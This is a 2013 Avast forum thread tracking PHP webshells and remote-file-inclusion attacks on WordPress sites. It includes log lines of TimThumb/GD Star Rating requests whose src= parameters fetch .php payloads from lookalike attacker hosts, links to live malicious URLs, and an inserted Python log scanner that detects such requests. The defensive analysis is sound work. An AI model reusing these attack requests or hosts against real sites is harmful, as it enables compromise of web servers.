On the look-out for bad visitors and php attacks...avast! Web Shield detects!

Website owners should always be on the lookout for “bad visitors” and PHP attacks.
Weak PHP is the royal way for malcreants to get into “your” website.
So it is good to have a look at the following logs now and then to know what is threatening us from the “Interwebs”.
Some example links:
http://www.computerhok.nl/tmp/logwatch/
http://fsiworldwide.com/logs/log.files.html
http://nepeta.mozai.com/scoundrels.html
http://champ.com.sg/watch/weekly/2013/02/03/cgi.html
http://www.steamid.co.uk/badvisitors.php?page=9
Now we can perform a search query in combination with the term, for instance “cok.php” combined with “urlquery.net”.
threat description http://forums.oscommerce.com/topic/378505-sites-hacked/ (link article author = gotlib)
see search result here: http://urlquery.net/report.php?id=912463 IDS alerts → INDICATOR-OBFUSCATION GIF header with PHP tags - likely malicious
and → INDICATOR-OBFUSCATION eval gzinflate base64_decode call - likely malicious
also look at the log interface here: http://leehaywood.org/rss/logs.php?t=404 with many an example…

and this for bajo.php: http://urlquery.net/report.php?id=954473 {“sha256”: “9652d7374719d7f80942e86ab0c7db992318fc4d3db0a81632cabee00395e59b”, “result”: 1, “last_analysis_url”: “/en/url/9652d7374719d7f80942e86ab0c7db992318fc4d3db0a81632cabee00395e59b/analysis/”, “timestamp”: 1360286884, “positives”: 3, “last_analysis_date”: “2013-02-08 01:28:04”, “total”: 34, “url_exists”: true, “reanalyse_url”: “/en/url/submission/?force=1&url=htxp://picasa.com.amareacao.com.br/bajo.php”}
{“result”: 0, “verbose_msg”: “Invalid URL”}…blacklisted only by scumware: http://www.urlvoid.com/scan/picasa.com.amareacao.com.br/

ff [gzip] tgt object detected as PHP:Agent-KQ[Trj] by avast! Web Shield - we have detection!

polonus

Here → -http://webcache.googleusercontent.com/search?q=cache:Tx0Sosq0joEJ:http://tech.graphicline.co.za/gd-star-ratings-vulnerability/%2Bwp-content/gd-star-rating+attack&client=flock&channel=fds&oe=utf-8&hl=en&ct=clnk
we can read about a flaw for this WP plug-in: wp-content/gd-star-rating/

GD Star Ratings vulnerability in plugin version 1.9.18 for WordPress contains a flaw that may lead to an unauthorized information disclosure. The vulnerability in GD Star Ratings is caused by the export.php script failing to properly verify user authentication. This may allow a remote attacker to gain access to system files and export sensitive information (e.g. user names, votes, email, and IP addresses).
Exploit very similar to the well-known Timthumb exploit pattern through content.gif (credits go to tech.graphicline.co.za article author Mike). Only solution is to update to version 1.9.20 and beyond…see all the attacked logs here:
****************** /wp-content/gd-star-rating/?src=htcp%3A%2F%2Fpicasa.com.m-2p.com/suntik.php *
09:39:11 13 Feb 2013 2 1,000 /wp-content/gd-star-rating/?src=htcp:/blogger.com.lendyourhome.org/cok.php
05:28:01 09 Feb 2013 2 1,000 /wp-content/gd-star-rating/?src=htvp:/flickr.com.alba-sport.net/bad.php
01:56:16 04 Feb 2013 4 2,000 /wp-content/gd-star-rating/?src=htxp:/picasa.com.compraonlinecr.com/index.php
20:21:11 01 Feb 2013 1 500 /wp-content/gd-star-rating/?src=htxp:/picasa.com.copiinet.ro/wordpress.php
14:34:55 01 Feb 2013 2 1,000 /wp-content/gd-star-rating/?src=htxp:/wordpress.com.allnetmall.com/shelltim.php
10:06:19 13 Feb 2013 11 5,500 /wp-content/gd-star-rating/timthumb.php?src=hxtp%3A%2F%2Fblogger.com.lendyourhome.org%2Fcok.php
09:41:39 13 Feb 2013 3 1,500 /wp-content/gd-star-rating/timthumb.php?src=htxp:/blogger.com.lendyourhome.org/cok.php

pol
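The log excerpt above (and the “bad visitors” logs linked in the first post) shows the same pattern over and over: a `src=` parameter pointing at a remote host whose name starts with a trusted image host (picasa.com, blogger.com, flickr.com, wordpress.com) but is actually registered under an attacker’s domain, fetching a .php file. The following scanner is an added example and is not code from the thread or from the GD Star Rating or TimThumb projects; the log lines it runs over are constructed in the same shape as the excerpt, and the host list and scoring are assumptions for illustration.

```python
"""Flag TimThumb-style remote-fetch attempts (e.g. gd-star-rating/?src=...) in access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hosts that old TimThumb versions trusted by a suffix/substring check; attackers register
# lookalikes such as picasa.com.example.net so that a check for "picasa.com" passes.
# Assumed list for illustration, not TimThumb's actual whitelist.
TRUSTED_IMAGE_HOSTS = ("picasa.com", "blogger.com", "flickr.com", "wordpress.com",
                       "youtube.com", "img.youtube.com")

# Constructed sample lines in the same shape as the excerpt in the post
# (time, date, hits, score, request). Not real captured traffic.
SAMPLE_LOG = """\
10:06:19 13 Feb 2013 11 5,500 /wp-content/gd-star-rating/timthumb.php?src=http%3A%2F%2Fblogger.com.lendyourhome.org%2Fcok.php
09:39:11 13 Feb 2013 2 1,000 /wp-content/gd-star-rating/?src=http:/picasa.com.m-2p.com/suntik.php
05:28:01 09 Feb 2013 2 1,000 /wp-content/gd-star-rating/?src=http:/flickr.com.alba-sport.net/bad.php
12:00:00 13 Feb 2013 1 500 /wp-content/gd-star-rating/timthumb.php?src=http://lh3.ggpht.com/photo.jpg&w=100
12:00:01 13 Feb 2013 1 500 /wp-content/themes/x/style.css
"""

LINE_RE = re.compile(r'^(?P<time>\S+) (?P<date>\d{2} \w{3} \d{4}) (?P<hits>\d+) '
                     r'(?P<score>[\d,]+) (?P<request>\S+)$')
# Accept "http://host" as well as the collapsed "http:/host" seen in the excerpt.
REMOTE_RE = re.compile(r'^(?P<scheme>[a-z][a-z0-9+.-]*):/+(?P<host>[^/?#]+)(?P<path>[^?#]*)', re.I)


def remote_src(request):
    """Return (host, path) if the request's src= parameter is a remote URL, else None."""
    query = urlsplit(request).query
    for value in parse_qs(query).get('src', []):
        # parse_qs already decodes once; unquote again to catch double-encoded values.
        m = REMOTE_RE.match(unquote(value))
        if m:
            return m.group('host').lower(), m.group('path')
    return None


def is_lookalike(host):
    """True if a trusted name appears inside the host but is not its real suffix."""
    return any(host != t and not host.endswith('.' + t)
               and (host.startswith(t + '.') or ('.' + t + '.') in host)
               for t in TRUSTED_IMAGE_HOSTS)


def classify(request):
    """Return reason strings for a request; an empty list means nothing suspicious."""
    found = remote_src(request)
    if not found:
        return []
    host, path = found
    reasons = ['remote src']
    if is_lookalike(host):
        reasons.append('lookalike host ' + host)
    if path.lower().endswith(('.php', '.php5', '.phtml')):
        reasons.append('script target ' + path)
    return reasons


def scan_log(text):
    """Return (request, reasons) for lines that look like remote-fetch attacks.

    A remote src alone is normal TimThumb use; flag only when a lookalike host
    or a script target joins it.
    """
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        reasons = classify(m.group('request'))
        if len(reasons) > 1:
            hits.append((m.group('request'), reasons))
    return hits


if __name__ == '__main__':
    for request, reasons in scan_log(SAMPLE_LOG):
        print(request, '->', ', '.join(reasons))
```

Run it against a real access log by feeding the file contents to `scan_log` after adjusting `LINE_RE` to the log format in use; the `classify` logic itself only needs the request string.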

PHP malcode can also be used in website defacement. For instance: crut.php. Notified by: AdiPaTi
See this list: http://www.zone-h.org/archive/ip=212.93.229.3
Is this once-defaced site now secure? No, it is not: http://sitecheck.sucuri.net/results/elvelux.si/oscomm see Powered by: PHP/5.3.20
Vulnerable to this attack -http://malwaremustdie.blogspot.nl/2013/01/peeking-at-jdb-exploit-kit-infector.html (reported by HulkCrusader)
avast! Web Shield detects trgt rss-rzip here as infected with JS:Decode-GB[Trj]. We have detection for this!

polonus

Sucuri http://sitecheck.sucuri.net/results/picasa.com.playteck.net/indeks.php

VirusTotal…no detection…yet
https://www.virustotal.com/nb/file/2dc4c1314af7d367e84c13b835911cd502cc1eff0e4c6d6d351e6aaa8ae530dd/analysis/1361555617/

Hi Pondus,

Good that the issue was started here then. Malware should be put down as close as possible to where the attack starts…
We are here to ruin the malcreant’s day. What is encouraging is that this: -http://labs.sucuri.net/db/malware/malware-entry-mwjsgen2
is being flagged by avast! Web Shield as JS:Illredir-AQ[Trj]. There the code is being detected!
Still has to be reported…https://www.virustotal.com/nb/file/05009d5813bedd67a4d3f69e7f8fb6bdd050df685e56eebc462d058a004b0670/analysis/1361557974/

pol

Bad visitors can also be youngsters thinking they are real hackers: http://carbonize.co.uk/wp/2009/03/10/sad-children-thinking-they-are-hackers/ (link article author = carbonize). Example here: http://zulu.zscaler.com/submission/show/47f4060329f77735222625fec4ba2609-1361627409
Flagged as TR/Script.75
Not detected here: http://wepawet.iseclab.org/view.php?hash=8f3dd06df8d1932d79e8b8e85c6d5798&t=1335177069&type=js
and http://quttera.com/sitescan/www.leikamzinn.at
And our avast! Web Shield detects this as PHP:Small-E[Trj]. We have detection for this!

polonus

One in the top 100 cgi scripts: htxp://img.youtube.com.merkezefendi.gov.tr/cilik.php → http://urlquery.net/report.php?id=882250
IDS alert: ET CURRENT_EVENTS php with eval/gzinflate/base64_decode possible webshell &
INDICATOR-OBFUSCATION eval gzinflate base64_decode call - likely malicious &
INDICATOR-OBFUSCATION GIF header with PHP tags - likely malicious
A file viewer tool cannot safely check this type of file.
Decoding the encrypted PHP gives what is shown in the attached image.
Avast does not detect: https://www.virustotal.com/nb/file/f4460108b01b1df8873b420217b981f2b529d47ce4817e0dd89db0c81f4580ee/analysis/1251295472/
Good, the malware seems dead now anyway: https://www.virustotal.com/nb/file/f4460108b01b1df8873b420217b981f2b529d47ce4817e0dd89db0c81f4580ee/analysis/1251295472/
blacklisted: http://www.urlvoid.com/scan/bandarlampung.us/
Another one here: http://urlquery.net/report.php?id=859053
See: https://www.virustotal.com/nb/file/ac9877e9680366873b6047679705d352db7c7dfd5a0a5add3fed90049f1fdbb7/analysis/1359179711/
But cilik.php is being detected by avast! Web Shield as PHP:Agent-MQ[Trj]. We have detection!

polonus

> Avast does not detect: https://www.virustotal.com/nb/file/f4460108b01b1df8873b420217b981f2b529d47ce4817e0dd89db0c81f4580ee/analysis/1251295472/
It does... if you post the latest scan from 1 minute ago ;) https://www.virustotal.com/nb/file/ac9877e9680366873b6047679705d352db7c7dfd5a0a5add3fed90049f1fdbb7/analysis/1361657277/

but not this http://urlquery.net/report.php?id=859053
https://www.virustotal.com/nb/file/a2410f9b5db6ce829a8fcb4386dded798fcf8c3b09ffc8713786d70c5d854537/analysis/1361657457/

Hi Pondus,

What would polonus do without Pondus being there to check the scan and crossing the t’s and dotting the i’s. Again thanks a lot my friend. Thanks for the ongoing inspiration and support.

many thanks,

Damian

it's all about teamwork ;D

A bit dated but still current, the attack methodology of the website attackers: http://blog.spiderlabs.com/2012/02/common-attack-methodologies-identified-in-european-customers.html
More recent and being slowly released (by article link author = Jeremiah Grossman): http://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/

polonus